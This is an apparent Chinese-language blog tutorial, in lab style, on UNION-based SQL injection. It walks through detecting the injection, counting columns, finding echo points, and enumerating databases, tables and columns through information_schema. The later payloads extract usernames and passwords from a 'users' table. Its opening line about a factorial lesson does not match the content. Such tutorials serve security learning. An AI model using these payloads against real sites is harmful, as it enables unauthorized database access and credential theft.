🏆今日学习目标：🍀学会阶乘之和题目✅创作者：贤鱼

@TOC

union 注入

原理

==利用 union 关键字==，union 会将前后两次查询结果拼在一起，由于是联合查询，必须保证字段数一致，也就是两个查询结果有相同列数

过程

1 判断数字或者字符串注入类型 2 判断字段数，查询有几个字段 3 判断回显点，有些字段存在但是不会输出内容，我们需要找到会显示的字段数 4 注入库名 5 注入表名 6 注入列名 7 查数据

判断数字或者字符串

输入：id=1id=1'id=1'--+==（--+是注释的意思）==

==为什么加个单引号会报错，而加个注释又会查询成功呢？==举个栗子：‘xxx xxx xxx’这样子是正常的‘xxx xxx id' xxx' 这样子第二个’是不是就会报错'xxx xxx id'--+xxx'这样子后面的‘就被注释掉了，也就不会报错了

判断字段数

上文说过，union 前后查询字段数必须一致，所以我们还要对字段数进行判断。在此可以利用==order by n==进行判断，意思是根据 n 个字段排序，如果不存在这个字段就会报错

这里依次查询 1，2，3，4，5

4 和 5 都会报错，所以可以得知，字段数为 3==当然 union 也是可以用的==

第一个是 1 查询的，后面三个是 1，2，3 查询的，1，2，3，4 依旧报错

判断回显点

这里的操作和上文 union 查询字段数一样

很明显，字段数 3 中，我们的 1，2，3 都输出了，所以回显点就是 1，2，3

注入库名

查询到回显点，就要开始注入了，想要注入数据，必须得到他的库名==获得库名可以用 database（）函数==如图：输入 id=-1' union select 1,2,3 --+

我们再回显点 2 位置注入，发现成功获得了库名

当然，换个位置效果一样分享几个查询数据库的方法

id=-1' union select 1,database(),3 --+查看所有数据库名称id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata --+id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata limit1,1 --+ # 查询第2个数据也可以用group_concat()函数将查询结果内容放入同一行id=-1' union select 1,group_concat(SCHEMA_name),3 from information_schema.schemata --+

注入表名

有了库名就可以查询表名了

id=-1' union select 1,group_concat(table_name),3 from information_schema.tableswhere table_schema='库名' --+

就可以查询到表名了

注入列名

查询到库名和表名就可以查询列名

d=-1' union select 1,group_concat(column_name),group_concat(data_type) frominformation_schema.columns where table_schema='库名' and table_name='表名' --+

查数据

接下来就是查询数据了

id=-1' union select 1,username,password from security.users limit 0,1 --+

id=-1' union select 1,concat(username,0x5c,password),3 from security.users limit 0,1 --+

id=-1' union select 1,group_concat(username,0x5c,password),3 from security.users--+

concat() ：将两个字段结合成为一个字段

<font size="5">==🏆结束语 union 注入的大致流程就是这样了，有需要的话订阅一下专栏吧，持续更新的==</font>